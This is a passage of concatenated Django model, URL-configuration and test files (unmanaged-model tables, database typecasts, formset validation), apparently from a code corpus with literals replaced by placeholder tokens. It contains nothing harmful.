<s> from __future__ import absolute_import <EOL> from django . db import connection <EOL> from django . test import TestCase <EOL> from . models import A01 , A02 , B01 , B02 , C01 , C02 , Unmanaged2 , Managed1 <EOL> class SimpleTests ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> a = A01 . objects . create ( f_a = "<STR_LIT:foo>" , f_b = <NUM_LIT> ) <EOL> B01 . objects . create ( fk_a = a , f_a = "<STR_LIT>" , f_b = <NUM_LIT> ) <EOL> c = C01 . objects . create ( f_a = "<STR_LIT>" , f_b = <NUM_LIT:1> ) <EOL> c . mm_a = [ a ] <EOL> a2 = A02 . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( a2 , A02 ) ) <EOL> self . assertEqual ( a2 . f_a , "<STR_LIT:foo>" ) <EOL> b2 = B02 . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( b2 , B02 ) ) <EOL> self . assertEqual ( b2 . f_a , "<STR_LIT>" ) <EOL> self . assertTrue ( isinstance ( b2 . fk_a , A02 ) ) <EOL> self . assertEqual ( b2 . fk_a . f_a , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( list ( C02 . objects . filter ( f_a = None ) ) , [ ] ) <EOL> resp = list ( C02 . objects . filter ( mm_a = a . id ) ) <EOL> self . assertEqual ( len ( resp ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( isinstance ( resp [ <NUM_LIT:0> ] , C02 ) ) <EOL> self . assertEqual ( resp [ <NUM_LIT:0> ] . f_a , '<STR_LIT>' ) <EOL> class ManyToManyUnmanagedTests ( TestCase ) : <EOL> def test_many_to_many_between_unmanaged ( self ) : <EOL> """<STR_LIT>""" <EOL> table = Unmanaged2 . _meta . get_field ( '<STR_LIT>' ) . m2m_db_table ( ) <EOL> tables = connection . introspection . table_names ( ) <EOL> self . assertTrue ( table not in tables , "<STR_LIT>" % table ) <EOL> def test_many_to_many_between_unmanaged_and_managed ( self ) : <EOL> """<STR_LIT>""" <EOL> table = Managed1 . _meta . get_field ( '<STR_LIT>' ) . m2m_db_table ( ) <EOL> tables = connection . introspection . table_names ( ) <EOL> self . assertTrue ( table in tables , "<STR_LIT>" % table ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) <EOL> class Location ( models . Model ) : <EOL> class Meta : <EOL> abstract = True <EOL> class Place ( Location ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) </s>
<s> from __future__ import absolute_import <EOL> from django . conf . urls import patterns , include <EOL> from . import views , customadmin , admin <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , views . secure_view ) , <EOL> ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> ( r'<STR_LIT>' , include ( customadmin . site . urls ) ) , <EOL> ( r'<STR_LIT>' , include ( admin . site . urls ) , dict ( form_url = '<STR_LIT>' ) ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Author ( models . Model ) : <EOL> first_name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> last_name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> class Article ( models . Model ) : <EOL> author = models . ForeignKey ( Author ) <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> class Entry ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT> ) <EOL> body = models . TextField ( ) <EOL> pub_date = models . DateField ( ) <EOL> enable_comments = models . BooleanField ( ) <EOL> def __str__ ( self ) : <EOL> return self . title <EOL> class Book ( models . Model ) : <EOL> dewey_decimal = models . DecimalField ( primary_key = True , decimal_places = <NUM_LIT:2> , max_digits = <NUM_LIT:5> ) </s>
<s> import datetime <EOL> from django . db . backends import util as typecasts <EOL> from django . utils import unittest <EOL> TEST_CASES = { <EOL> '<STR_LIT>' : ( <EOL> ( '<STR_LIT>' , None ) , <EOL> ( None , None ) , <EOL> ( '<STR_LIT>' , datetime . date ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> ) ) , <EOL> ( '<STR_LIT>' , datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> ( '<STR_LIT>' , None ) , <EOL> ( None , None ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:8> , <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:8> , <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:12> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:12> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:12> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:12> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> ( '<STR_LIT>' , None ) , <EOL> ( None , None ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:0> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ) , <EOL> } <EOL> class DBTypeCasts ( unittest . TestCase ) : <EOL> def test_typeCasts ( self ) : <EOL> for k , v in TEST_CASES . iteritems ( ) : <EOL> for inpt , expected in v : <EOL> got = getattr ( typecasts , k ) ( inpt ) <EOL> self . assertEqual ( got , expected , "<STR_LIT>" % ( k , inpt , expected , got ) ) </s>
<s> from django . forms import Form , CharField , IntegerField , ValidationError , DateField <EOL> from django . forms . formsets import formset_factory , BaseFormSet <EOL> from django . test import TestCase <EOL> class Choice ( Form ) : <EOL> choice = CharField ( ) <EOL> votes = IntegerField ( ) <EOL> ChoiceFormSet = formset_factory ( Choice ) <EOL> class FavoriteDrinkForm ( Form ) : <EOL> name = CharField ( ) <EOL> class BaseFavoriteDrinksFormSet ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> seen_drinks = [ ] <EOL> for drink in self . cleaned_data : <EOL> if drink [ '<STR_LIT:name>' ] in seen_drinks : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> seen_drinks . append ( drink [ '<STR_LIT:name>' ] ) <EOL> class EmptyFsetWontValidate ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> raise ValidationError ( "<STR_LIT>" ) <EOL> FavoriteDrinksFormSet = formset_factory ( FavoriteDrinkForm , <EOL> formset = BaseFavoriteDrinksFormSet , extra = <NUM_LIT:3> ) <EOL> class FormsFormsetTestCase ( TestCase ) : <EOL> def test_basic_formset ( self ) : <EOL> formset = ChoiceFormSet ( auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( str ( formset ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : u'<STR_LIT>' } ] ) <EOL> formset = ChoiceFormSet ( ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertFalse ( formset . has_changed ( ) ) <EOL> def test_formset_validation ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ u'<STR_LIT>' ] } ] ) <EOL> def test_formset_has_changed ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> blank_formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( blank_formset . has_changed ( ) ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> invalid_formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( invalid_formset . is_valid ( ) ) <EOL> self . assertTrue ( invalid_formset . has_changed ( ) ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> valid_formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( valid_formset . is_valid ( ) ) <EOL> self . assertTrue ( valid_formset . has_changed ( ) ) <EOL> def test_formset_initial_data ( self ) : <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : u'<STR_LIT>' } , { } ] ) <EOL> def test_second_form_partially_filled ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { } , { '<STR_LIT>' : [ u'<STR_LIT>' ] } ] ) <EOL> def test_delete_prefilled_data ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ u'<STR_LIT>' ] , '<STR_LIT>' : [ u'<STR_LIT>' ] } , { } ] ) <EOL> def test_displaying_more_than_one_blank_form ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { } , { } , { } ] ) <EOL> def test_single_form_completed ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : u'<STR_LIT>' } , { } , { } ] ) <EOL> def test_second_form_partially_filled_2 ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { } , { '<STR_LIT>' : [ u'<STR_LIT>' ] } , { } ] ) <EOL> def test_more_initial_data ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } ] <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> self . assertTrue ( formset . empty_form . empty_permitted ) <EOL> self . assertHTMLEqual ( formset . empty_form . as_ul ( ) , """<STR_LIT>""" ) <EOL> def test_formset_with_deletion ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , can_delete = True ) <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } , { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : False , '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True , '<STR_LIT>' : u'<STR_LIT>' } , { } ] ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . deleted_forms ] , [ { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True , '<STR_LIT>' : u'<STR_LIT>' } ] ) <EOL> class CheckForm ( Form ) : <EOL> field = IntegerField ( min_value = <NUM_LIT:100> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> CheckFormSet = formset_factory ( CheckForm , can_delete = True ) <EOL> formset = CheckFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> formset = CheckFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> class Person ( Form ) : <EOL> name = CharField ( ) <EOL> PeopleForm = formset_factory ( <EOL> form = Person , <EOL> can_delete = True ) <EOL> p = PeopleForm ( <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> self . assertTrue ( p . is_valid ( ) ) <EOL> self . assertEqual ( len ( p . deleted_forms ) , <NUM_LIT:1> ) <EOL> def test_formsets_with_ordering ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True ) <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } , { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] ) <EOL> def test_empty_ordered_fields ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ <EOL> { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : None , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:50> , '<STR_LIT>' : None , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] ) <EOL> def test_ordering_blank_fieldsets ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ ] ) <EOL> def test_formset_with_ordering_and_deletion ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True , can_delete = True ) <EOL> initial = [ <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } , <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } , <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } , <EOL> ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : False , '<STR_LIT>' : 